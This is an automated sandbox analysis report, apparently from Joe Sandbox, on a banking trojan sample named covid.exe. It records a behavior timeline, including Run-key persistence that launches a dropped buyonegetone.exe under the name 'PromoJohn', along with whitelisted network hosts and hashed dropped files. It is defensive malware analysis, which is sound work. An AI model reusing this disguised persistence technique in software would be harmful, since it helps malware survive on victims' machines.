Overall analysis duration: 0h 10m 37s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: covid.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 40
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.bank.troj.evad.winEXE@32/132@14/13
EGA Information: Failed
HDC Information:
• Successful, ratio: 99.5% (good quality ratio 89.7%)
• Quality average: 63.3%
• Quality standard deviation: 32.6%
HCA Information:
• Successful, ratio: 51%
• Number of executed functions: 68
• Number of non-executed functions: 152
                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                  • Adjust boot time
                                                                                                                                                                  • Enable AMSI
                                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                                  Warnings:
                                                                                                                                                                  • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 40.88.32.150, 104.42.151.234, 13.64.90.137, 92.122.145.220, 88.221.62.148, 104.17.112.188, 104.17.113.188, 2.20.84.44, 172.217.168.8, 142.250.185.110, 142.250.185.142, 142.250.185.174, 142.250.185.238, 216.58.212.174, 142.250.74.206, 142.250.186.46, 142.250.186.78, 142.250.186.110, 142.250.186.174, 172.217.18.110, 172.217.23.110, 142.250.185.78, 172.217.16.142, 184.30.25.161, 172.217.168.14, 13.107.246.19, 13.107.213.19, 52.142.114.2, 204.79.197.200, 13.107.21.200, 172.217.168.70
                                                                                                                                                                  • Excluded domains from analysis (whitelisted): standard.t-0009.t-msedge.net, c-msn-com-nsatc.trafficmanager.net, c-bing-com.a-0001.a-msedge.net, wildcard.moatads.com.edgekey.net, store-images.s-microsoft.com-c.edgekey.net, cdn.who.int.cdn.cloudflare.net, e11290.dspg.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, go.microsoft.com, www.googletagmanager.com, star-azurefd-prod.trafficmanager.net, dual.t-0009.t-msedge.net, watson.telemetry.microsoft.com, v1.addthisedge.com.edgekey.net, www.google-analytics.com, e3615.a.akamaiedge.net, skypedataprdcolwus17.cloudapp.net, ds-s7.addthis.com.edgekey.net, www-google-analytics.l.google.com, dual-a-0001.a-msedge.net, fonts.gstatic.com, www-googletagmanager.l.google.com, static-doubleclick-net.l.google.com, youtube-ui.l.google.com, store-images.s-microsoft.com, c.bing.com, www.who.int.cdn.cloudflare.net, t-0009.t-msedge.net, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, Edge-Prod-FRAr3.ctrl.t-0009.t-msedge.net, e13136.g.akamaiedge.net, ds-m.addthisedge.com.edgekey.net, skypedataprdcolwus16.cloudapp.net
                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                                                  Simulations

                                                                                                                                                                  Behavior and APIs

Time | Type | Description
08:04:27 | API Interceptor | 25x Sleep call for process: powershell.exe modified
08:04:47 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run PromoJohn C:\Users\user\AppData\Roaming\buyonegetone.exe
08:04:50 | API Interceptor | 4x Sleep call for process: buyonegetone.exe modified
08:04:55 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run PromoJohn C:\Users\user\AppData\Roaming\buyonegetone.exe
08:05:04 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run PromoJohn C:\Users\user\AppData\Roaming\buyonegetone.exe
08:05:14 | API Interceptor | 3x Sleep call for process: WerFault.exe modified

                                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                                  IPs


                                                                                                                                                                    Domains


                                                                                                                                                                    ASN


JA3 Fingerprints


Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_mobsync.exe_44a5b269f1a49ba3186879c0fde267f2e16e4817_c086f9de_1b3be2ab\Report.wer
Process: C:\Windows\System32\WerFault.exe
File Type: Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Size (bytes): 10612
Entropy (8bit): 3.757413548023496
Encrypted: false
SSDEEP: 96:BZJxiDe0y5Mod7Jf62pXIQcQqc6mcEKcw34eFR4+HbHgoC5AJLnxZU6Shjo6iNkm:PJxWe9HkigMqjuV/u7syS274lt3du
MD5: B5FE8E57E4E889840E4C822807AE8618
SHA1: 601C3EA95DF19A6AA68DC4B90E1097B4D1A3F6D2
SHA-256: D820E2F241448964EB624C4C46BA98CEDA0DF08EA3E0913DB5EBC4F4560FFECF
SHA-512: BDF11FD2C0C9353959CEA43665AC2B849D82436DFE7C360F289F9FA3A251F6368635CDC63F026517C2FE2CAA6076F3C0FFB8DAA6002BCAA0AE8000AD91553723
Malicious: false
                                                                                                                                                                    Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.1.7.6.3.0.9.2.4.8.5.6.3.4.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.1.7.6.3.0.9.3.6.8.5.6.1.8.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.0.e.2.3.4.a.7.-.4.2.2.b.-.4.b.5.9.-.9.9.2.f.-.d.3.2.6.7.e.6.6.2.2.f.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.b.e.c.a.b.7.9.-.9.9.4.8.-.4.2.0.b.-.a.9.6.0.-.9.7.f.a.d.2.3.1.1.5.0.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.m.o.b.s.y.n.c...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.m.o.b.s.y.n.c...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.e.8.-.0.0.0.1.-.0.0.1.7.-.9.8.e.4.-.9.5.5.b.0.8.2.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.f.8.a.0.1.b.0.e.3.b.9.a.f.a.b.f.e.1.6.3.f.1.0.e.9.d.d.d.7.b.d.e.8.7.1.f.c.7.4.!.m.o.b.s.y.n.c...e.x.e.
                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_mobsync.exe_7ec0eae3caa970bb3a358dd54d1dc4b33fa028_c086f9de_112408b2\Report.wer
                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):10614
                                                                                                                                                                    Entropy (8bit):3.756570990247043
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:HX464emiDz0y5Mod7JfgpXIQcQqc6mcEKcw34eFR4+HbHgoC5AJLnxZU6Shjo6iQ:3rPmWzQHkigMqjuV/u7s3S274lt3+
                                                                                                                                                                    MD5:04589A223CEAFDE6AD6995126BAD323C
                                                                                                                                                                    SHA1:C1FEAAB9374FB8D13017D57DF39AE56DDB7F9CC0
                                                                                                                                                                    SHA-256:8F2A65874865432A87E8E30B9CF56C230B99F7B0CC74E7F46B1519A8426A7B06
                                                                                                                                                                    SHA-512:EBA205173573DA29CDE63C679DDB6984A05EA62B8992840FD4B909494AB825988143FBF72B81252C774C773906463021339C14E472AFB0292DBBC48CF3775D7D
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.1.7.6.3.1.0.1.0.8.1.5.3.1.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.1.7.6.3.1.0.2.9.3.3.5.0.8.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.8.0.7.d.a.e.5.-.8.3.9.1.-.4.c.f.a.-.9.d.9.d.-.3.d.8.e.e.d.9.1.7.8.6.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.9.3.4.5.a.1.6.-.c.d.b.5.-.4.5.2.7.-.8.8.5.7.-.3.a.f.7.8.b.9.7.a.7.b.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.m.o.b.s.y.n.c...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.m.o.b.s.y.n.c...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.5.0.-.0.0.0.1.-.0.0.1.7.-.d.e.1.3.-.e.e.6.0.0.8.2.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.f.8.a.0.1.b.0.e.3.b.9.a.f.a.b.f.e.1.6.3.f.1.0.e.9.d.d.d.7.b.d.e.8.7.1.f.c.7.4.!.m.o.b.s.y.n.c...e.x.e.
                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_mobsync.exe_dec4da371fcafe4b9daf4e1d1160ddc76b221fb4_c086f9de_13a04abc\Report.wer
                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):9938
                                                                                                                                                                    Entropy (8bit):3.761139012919715
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:8KEFiDcy5MoU7JfdpXIQcQzc6gcEfcw3P7R4+HbHgoC5AJLnxZU6Shjo6iNkon9c:nEFWkHNkl/ju//u7s3S274lt3e
                                                                                                                                                                    MD5:424C54186A976C33D2D00C5205899BB8
                                                                                                                                                                    SHA1:47069D17BD5AE473AA0614A0BA7DD4E75F67FD6F
                                                                                                                                                                    SHA-256:B0F0F56165F5CE45ECA3DB8894444C11CCE1187FFC7794572D951896028A6E25
                                                                                                                                                                    SHA-512:875DE4072E8CC52DBB49DCD293C49E5DDD8447F19233E586D2927C48337E811FA6427C81780386F1719119EBA00CDFD199A57CE92777BE70874E73481C83254A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.1.7.6.3.1.1.2.2.9.4.6.4.2.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.1.7.6.3.1.1.4.4.8.3.5.8.7.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.9.2.1.3.3.4.c.-.8.e.2.0.-.4.9.c.7.-.8.f.8.8.-.8.6.b.0.d.5.3.7.5.d.3.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.c.8.3.d.e.1.0.-.8.e.d.5.-.4.e.2.9.-.8.8.c.9.-.7.c.9.2.9.0.d.a.9.b.a.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.m.o.b.s.y.n.c...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.m.o.b.s.y.n.c...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.8.0.-.0.0.0.1.-.0.0.1.7.-.7.4.5.3.-.5.f.6.6.0.8.2.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.f.8.a.0.1.b.0.e.3.b.9.a.f.a.b.f.e.1.6.3.f.1.0.e.9.d.d.d.7.b.d.e.8.7.1.f.c.7.4.!.m.o.b.s.y.n.c...e.x.e.
                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8BB2.tmp.dmp
                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                    File Type:Mini DuMP crash report, 14 streams, Thu Apr 1 15:04:53 2021, 0x1205a4 type
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):66526
                                                                                                                                                                    Entropy (8bit):1.4325017610787516
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:GmnWjAgIndenHyfyxcJaJXdEJiNeOTPdPM:RWjAgIbfacEJewNeOS
                                                                                                                                                                    MD5:FBAF156E66117A00B29B938812B9DE70
                                                                                                                                                                    SHA1:5F83CF4E19C47B938E4383773309EC54EA139BCD
                                                                                                                                                                    SHA-256:7C1C2D035F4F5901F3FE833E4DEC987525DFB1E84BD2CBB7A82DFC52C25D8224
                                                                                                                                                                    SHA-512:8C43442E9C953882353901B504DC2636B39FC3E3331A1DDF12FF99264BF82C78E98F30C70816387F31278F82908E5F5E2576C9AA5997563A93B97E4CFC74A7C5
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8ECF.tmp.WERInternalMetadata.xml
                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):8702
                                                                                                                                                                    Entropy (8bit):3.702319147694354
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:Rrl7r3GLNiwtDfh6YSxRrFSgmfGRSxbQCpDY89bwUlf+Qm:RrlsNiC16YERrFSgmfGRSHwGfw
                                                                                                                                                                    MD5:C31FDDB752911738B8033EC76238E8C2
                                                                                                                                                                    SHA1:53ABF96E15D9DD6F06E4DA8EB7F3D9C4C2F7C0E2
                                                                                                                                                                    SHA-256:FFD0CA2366A217D79B844A966F674EAAF3E88008A5704AA4F4D5F173831DBCDA
                                                                                                                                                                    SHA-512:CBFE8CDAD8C652ABBFCF7D7EE50C8076B6DB57134F9E3EA305C1CB453D7A4E71B4C88E08A27C4DBFB87C1E44804F20D71CE8DE6DDBF1A28A473225A99112C919
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.8.8.<./.P.i.d.>.......
                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8FF9.tmp.xml
                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4661
                                                                                                                                                                    Entropy (8bit):4.446749039167229
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:cvIwSD8zszJgtBI9m4WSC8Bs8fm8M4JrTFvL0yq85HknIWZAd:uITfNkxSNXJS5nIWZAd
                                                                                                                                                                    MD5:75A9A21589BA83E5BA46FE923D6879A0
                                                                                                                                                                    SHA1:2C3E8B5AB930D6BF8D02DB05C6B5291284DD4237
                                                                                                                                                                    SHA-256:2FBC930E153118925C64D81DE80559724E1ECD039E5296A901A9FB7799F4BD4F
                                                                                                                                                                    SHA-512:4E73C27A5B276AEB0E0C649FBDC6AEC0C2780066F8ACB86A77D3AF0F6B6EA2BEF34D1A40A0AF6F5925CE86FB391B08A45294B58CD720E00314D21786931ECC48
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="927375" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERAD43.tmp.dmp
                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                    File Type:Mini DuMP crash report, 14 streams, Thu Apr 1 15:05:01 2021, 0x1205a4 type
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):67054
                                                                                                                                                                    Entropy (8bit):1.4202436436937864
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:5v48M75Zk1WcrRqD6Yyi9qHyFByxcJsOk+dCDwejJax7PCWInmIxBlNMx9Y/Itjd:Gkf9k6nnHyfyxcJaJijy4SYRDvP1J
                                                                                                                                                                    MD5:2A3627D340227862B537BF124C949A2A
                                                                                                                                                                    SHA1:2FA5D62D776396E923E81278C634A61A0DCCF341
                                                                                                                                                                    SHA-256:FFB9FFFC572294CA49AE656B0BC9379FBBD18F7F6860AB28D6B1004808C7A678
                                                                                                                                                                    SHA-512:3BF4CE554292812983AA98B67B93DC0C1AE9EE543D7EFA70F24400C6EC60A4CEFD2E54042E2B35550CB565F56DCB5110D28D87C5506134A5A274036B48091B56
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERB0CF.tmp.WERInternalMetadata.xml
                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):8706
                                                                                                                                                                    Entropy (8bit):3.700778354367099
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:Rrl7r3GLNicBG6YSGFwwNaPkgmfGSSxbQCpDa89b9F9f0c/m:RrlsNiyG6Yp9NaPkgmfGSSB9/fA
                                                                                                                                                                    MD5:7C727802E1A4DAECE8A24492540C29DD
                                                                                                                                                                    SHA1:00B54C5E1BFDE38CA256C7B0F55A9B1CB9D67E10
                                                                                                                                                                    SHA-256:2CF3F615F64CC1DA732F45AAF480729C49C26D868E10C635E64BC38F2CB4B36C
                                                                                                                                                                    SHA-512:151B35DE13A6EF3839FED9D03B863EEC7346CFC2954B83BF45E80DAFA53591D5008A8B224862A53DC2BBB3DD7326847702FA5482F00F7D9A72AFE14E73CE7796
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.2.2.4.<./.P.i.d.>.......
                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERB350.tmp.xml
                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4661
                                                                                                                                                                    Entropy (8bit):4.448149148824588
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="927375" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERD916.tmp.dmp
                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                    File Type:Mini DuMP crash report, 14 streams, Thu Apr 1 15:05:13 2021, 0x1205a4 type
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):49392
                                                                                                                                                                    Entropy (8bit):1.463907381718521
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERDEB5.tmp.WERInternalMetadata.xml
                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):8570
                                                                                                                                                                    Entropy (8bit):3.7049434717342553
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    Malicious:false
Preview: <?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>.. <WindowsNTVersion>10.0</WindowsNTVersion>.. <Build>17134</Build>.. <Product>(0x30): Windows 10 Pro</Product>.. <Edition>Professional</Edition>.. <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString>.. <Revision>1</Revision>.. <Flavor>Multiprocessor Free</Flavor>.. <Architecture>X64</Architecture>.. <LCID>1033</LCID>.. </OSVersionInformation>.. <ProcessInformation>.. <Pid>5504</Pid>..
                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERE0E8.tmp.xml
                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4721
                                                                                                                                                                    Entropy (8bit):4.482158702436243
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="927375" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\covid.exe.log
                                                                                                                                                                    Process:C:\Users\user\Desktop\covid.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):226
                                                                                                                                                                    Entropy (8bit):5.354940450065058
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\6CRF1DVL\www.youtube[1].xml
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                    Category:modified
                                                                                                                                                                    Size (bytes):13412
                                                                                                                                                                    Entropy (8bit):5.140209567632931
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    Malicious:false
